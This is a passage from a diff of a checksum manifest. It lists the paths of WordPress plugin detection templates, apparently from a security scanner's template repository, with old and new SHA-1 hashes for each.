-http/technologies/wordpress/plugins/classic-widgets.yaml:88f9d63b14aae7b60581ff2df8f1be791688cd58 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:cea95f563c150a5fd757a75512a573b6c8675512 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:f7e4f1b9231d25d8bdcfea19c7b6a09b97e367b3 -http/technologies/wordpress/plugins/coblocks.yaml:e4bd2210721e1fda60d1ac0086349ed3d4411c99 -http/technologies/wordpress/plugins/code-snippets.yaml:4d0aa2eaadc011a2e9e1fc7400415c057f16ce31 -http/technologies/wordpress/plugins/coming-soon.yaml:d576ac737cbc6857b25b1299f5781b4030b5c5a2 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:1cf1c9fdb0b096eff63693161f1220547c5eb860 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7a3b65c0790e60323c0a5992e5aaa5c2a646c805 -http/technologies/wordpress/plugins/contact-form-7.yaml:eab24ec6c20bd9dda981116d26896d4e64a96e4e -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:e32b11178eb658bb87e78ea32e5a12a0ccddf883 -http/technologies/wordpress/plugins/cookie-law-info.yaml:0c34332f33b456272766b058c3d412701f2a3ecd -http/technologies/wordpress/plugins/cookie-notice.yaml:0dfff2063b1979f59f599d5c614f43e80f589af1 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:4852eaa8a92e0ae86bd2c541503f9dddf32346b1 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:28f36fb5059a5b62190cf9327b7b0db309cd8b8b -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:be3c36a9139845a4c14f08a2a66d8b861c082d1b -http/technologies/wordpress/plugins/custom-css-js.yaml:fbb677dd313412bf501f0f300eb6b9968ccf22c9 -http/technologies/wordpress/plugins/custom-fonts.yaml:35a4df3e7e451d171326f5ff59a021ef475fa3c9 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b26943c0591f2a08a9ef4597625ba6b15161f3fe -http/technologies/wordpress/plugins/disable-comments.yaml:86418d7fd77615ed015d70709635d88cfeb05eee -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6c5c91d2f04cd4d03cd03cc1059ef4ab3d984e80 -http/technologies/wordpress/plugins/duplicate-page.yaml:8d0d9ac3ec5248c39f31cdf50a6a8619f726fd5f -http/technologies/wordpress/plugins/duplicate-post.yaml:44adf9ed1434bb8540672d72808aaeb92e401f7a -http/technologies/wordpress/plugins/duplicator.yaml:c2858bf75dec80f1327697a09f47f68034ae6a9d -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:83442b67a45f903fc92b6449a14aca0930a77ef2 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9ec26d3937d3e20d4f4bf5491c6eb75623103816 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b92716a7f0ab86db12106fb3a0ee87a33f7ce6de -http/technologies/wordpress/plugins/elementor.yaml:25afbcd14bb8cbc097483c7b618317f079d8921b -http/technologies/wordpress/plugins/elementskit-lite.yaml:a71ed5028ddc6af8eef7af85945412b99892f1bd -http/technologies/wordpress/plugins/enable-media-replace.yaml:1329f0ed3017302a90f06396a090ce93daf89715 -http/technologies/wordpress/plugins/envato-elements.yaml:c1c8b21b6802e1337d65417dd81e87584532a7b8 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:7f8c91b16e12ddc67de7a022c3b8f301f0901f2b -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:258e6db594f6aab2264bb520be74600751ad66b2 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:7626fe56d2d2c82215e7a8e2b9dd4666f3dc72e7 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f1c82930e8f48ecc71ac1da144e388b261055d19 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:373ee5e13ff7a25ff8bb0f5e5f1fa13bab74641b -http/technologies/wordpress/plugins/flamingo.yaml:0813b57e8ff4d96dac6cfe451550d16d17f80e11 -http/technologies/wordpress/plugins/fluentform.yaml:e407611c5b760b78473887e802f625004dcbe2d2 -http/technologies/wordpress/plugins/font-awesome.yaml:d2a2fdeb4624e0c409d9024706d1ab7b5f50285c -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:97ee157a891665e2b082f6eef70466114dd99c73 -http/technologies/wordpress/plugins/formidable.yaml:c829024a8eb286f043196cf06eba176a8e264bf7 -http/technologies/wordpress/plugins/forminator.yaml:5ac9eba2f051d595318fda702105d403a0685306 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:e2510c1c6bda3b64ac16d6f11cea6daa126e9bae -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:cd626422326a4742e3848d431cb3baba65aacc8c -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:57038fad7141bc4413c7474710870d8ccc57c930 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:978ceda54ab190a7603cee18ad6ec264af359fd2 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:71fd3110bb083c73577b7f176ea6eea50f36dc99 -http/technologies/wordpress/plugins/google-site-kit.yaml:2257ca703bf090ad5a3893632371ca1c261fe932 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:ce1636f135ccc2e37136aad670f7d002f839745f -http/technologies/wordpress/plugins/gtranslate.yaml:28ab4ee6860b3388aa5d38ba8d7b52f4be92064e -http/technologies/wordpress/plugins/gutenberg.yaml:fa0b61c0091ccd3ee518e76d804a5e2ca92a56a0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:63235e3dbeb7a6d1e3665ab985328d3b3e32d636 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:2ad710f2058364e95e543ddf54bd3114ef85e96c -http/technologies/wordpress/plugins/header-footer-elementor.yaml:29c87cfe02b5022d7ce2d823339976594aa860de -http/technologies/wordpress/plugins/header-footer.yaml:37f2d599d19c07115e4f126510e6d93934832032 -http/technologies/wordpress/plugins/health-check.yaml:233971ec58e6ca0271b3da28a9177bb7e03c9ff6 -http/technologies/wordpress/plugins/hello-dolly.yaml:f964309e2301bf39690b09fc3a3c802d4e09176f -http/technologies/wordpress/plugins/host-webfonts-local.yaml:bfde29820a4369e30858b7c4b859acaddaec8a16 -http/technologies/wordpress/plugins/hostinger.yaml:6d947bdb5b4b57868e6c4c30e1a6ec5d8019b2bd -http/technologies/wordpress/plugins/image-optimization.yaml:3b46dc70690a82c84d874ff77fa72f280a10b4af -http/technologies/wordpress/plugins/imagify.yaml:e9291fc6b43fc9c3b921ca7ed3413fb8d0b8beae -http/technologies/wordpress/plugins/imsanity.yaml:5b0b660a0fb0fe0714b9b426fe7a3ad061b60a6d -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:1f482f6cd73a641f777dee092fc5ea27d2e74485 -http/technologies/wordpress/plugins/instagram-feed.yaml:3a57b667455a5a65cf1a0f4e85323799787ac5ed -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:7446b2b8e5ab92d068cd67f8e1de0b01be51ae55 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:5bb71e48d5c3f45efd4d7ae84abbd1787f5257d1 -http/technologies/wordpress/plugins/jetpack.yaml:c057a3404373398e3057537f8fdc8c04332be4bb -http/technologies/wordpress/plugins/kadence-blocks.yaml:d36b58a83cfcee47d1e656afa928fa5338666942 -http/technologies/wordpress/plugins/kirki.yaml:aacaadecbdf48b39bde4fffbd819fa9fed0c6f7f -http/technologies/wordpress/plugins/leadin.yaml:0f9e3aaa5be6d2974245ba5d099112da4c8eb3aa -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:4971f7f35c5a84dd06b78242d6dde346e57b23cc -http/technologies/wordpress/plugins/limit-login-attempts.yaml:39aeab01ac5fd9ec98a892ed8982bf6148e8975e -http/technologies/wordpress/plugins/litespeed-cache.yaml:3fab61b34d22fb8b94bf58c73d537d4c38d7acd9 -http/technologies/wordpress/plugins/loco-translate.yaml:526246ccc489126a99fe38ba794b084ae4b5affc -http/technologies/wordpress/plugins/loginizer.yaml:7fb1d2edb7ab5aa8d97e670c00f9e08e9147331b +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:e3699bcbf44c37650887f0ec42025e01673c21f0 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:15069208400bfb23a60b4c3ffee9818b1e3b43e6 -http/technologies/wordpress/plugins/mailpoet.yaml:657c0f32bea2fbc636f4bd8cfc448a084dfd4119 -http/technologies/wordpress/plugins/maintenance.yaml:3c34597c2a905a020e9261b8c4d9c0446536f236 -http/technologies/wordpress/plugins/mainwp-child.yaml:8307680b071306493f5b55e9cc0bd4dcedbf950c -http/technologies/wordpress/plugins/malcare-security.yaml:0ad0c5c99479d2b9de0223c4951797e6bb86ea5d -http/technologies/wordpress/plugins/megamenu.yaml:7c5a98f6eaa4f9d0c5838ed75b3bb678bdee303a -http/technologies/wordpress/plugins/members.yaml:6fb212c4300025160f0356c8ffe147ca67e9cfab -http/technologies/wordpress/plugins/meta-box.yaml:49e37ec88229bb33f601437295a5161c637bdbd9 -http/technologies/wordpress/plugins/metform.yaml:5396dc363939b8e4d40088d7f7fee61cd7b7c3a2 -http/technologies/wordpress/plugins/ml-slider.yaml:cf4ad2a10d1ccb6613c7fa7858920f1881310f2b -http/technologies/wordpress/plugins/newsletter.yaml:def73a7d65cd88947299598ae741e5c4bbe711b8 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:775ad13b6101c09056840b2e7baac58469fd88fb -http/technologies/wordpress/plugins/nextgen-gallery.yaml:2283bb25e788f0a90601082e429fe5cdac28a173 -http/technologies/wordpress/plugins/ninja-forms.yaml:bfe6ee635ae12c8329966ece64ad9bcc6e708ce4 -http/technologies/wordpress/plugins/ocean-extra.yaml:24a3fce6570b90bfdd34238f0c89d73a3fa044d4 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:595eedd5b2032c9a9d0fa00b4a1aa2897c360a7e -http/technologies/wordpress/plugins/one-click-demo-import.yaml:31cd4657399d5d6a010d53f918da58e5d3070d95 -http/technologies/wordpress/plugins/optinmonster.yaml:97b95c28f301e2df08d74761b2fbb7335d105d96 -http/technologies/wordpress/plugins/otter-blocks.yaml:3eebd6b7f306e4e3f14f5498573a454977564ec8 -http/technologies/wordpress/plugins/password-protected.yaml:206aebab065a7e553f9039a0f2982a61289751c3 -http/technologies/wordpress/plugins/pdf-embedder.yaml:6f53f0a3d5d39fa094f4256d945881263b3d2928 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b548cca1adc151cf91f4999df3c1a85a64f663f7 -http/technologies/wordpress/plugins/pixelyoursite.yaml:603a515735ea3638fcda26c283c9c976e7c8e584 -http/technologies/wordpress/plugins/polylang.yaml:d1d15de289f918042a6935617164d2e041497a09 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:8863e727d41d7ebfa96177233723d71ed52c8f94 -http/technologies/wordpress/plugins/post-smtp.yaml:0d1f05fdf40f66ccc478654bedb5eff7d9d6a701 -http/technologies/wordpress/plugins/post-types-order.yaml:538b511a445d6febe9ae8c730007073863af0cef -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:d5fefdbd0138b5ed6b4c349c67747163c31a7ec0 -http/technologies/wordpress/plugins/pretty-link.yaml:14231c8d7579b32eea8f3c209ffcd3126a052e11 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:c6a041519e2e78a456384ba6a011c578f40f9356 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:42ac14dda267d0f44061427b5ac30fade5aa7e6d -http/technologies/wordpress/plugins/redirection.yaml:62249e7fbe5b980a8ca9086de99b08d6f54cc3e4 -http/technologies/wordpress/plugins/redux-framework.yaml:1e21e1c27f0f5a50ed0dcfb1bbe4bab213b11a72 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:3889397bbd2f005cbc423fc7533e5b06a1fe98c3 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:0aa09230419259e0dceed1197ce55c5e60670b84 -http/technologies/wordpress/plugins/safe-svg.yaml:b98be73766cb618471f3aee4c085efd8562f3541 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d5fa22ba94f292c4ba740d1a333918a7212d35bf -http/technologies/wordpress/plugins/sg-cachepress.yaml:0b158e3aa223a80acadac8cae9bf3965f13be7cb -http/technologies/wordpress/plugins/sg-security.yaml:956ea87a319f05657ed87d59c0ab4ec3e5e32b94 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:dfb9d0d4d3fe39924aef36b555ec9a18e75646c9 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:7992f73a05643e0a6ba645969942badd822e8378 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:9fa05ad6526c1ec78eb1b85c5bd0799b5a04fbf2 -http/technologies/wordpress/plugins/simple-history.yaml:5d75de0b17618f8cea3797e1f1e5cf94354b4623 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:5042fad13404ffc8c70d63974d663bdb2958b6a5 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:7dcff2bc03c4425e7c5e87fbb218f1cc1ac8ae0a -http/technologies/wordpress/plugins/smart-slider-3.yaml:3a91eb3e5a01c0a150e0590c630fc717b837806d -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:26dbcf480b06136ed8124dbab9e7c6d2fb5049f5 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:ac555d61433f134bed93206e6e52ebdaba16b97f -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7f695de002fcc4309824b35ef76972930f88ba7f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:803103b2c672921557c1b44eaabe6823d622c15d -http/technologies/wordpress/plugins/svg-support.yaml:9f788846c01152831f8beac6662f28045498efe6 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:2de018b459538943f2a2bbefa63fcb0889fb0ae3 -http/technologies/wordpress/plugins/tablepress.yaml:60d196ad787af4a6b9104624e5fec9e9998808c8 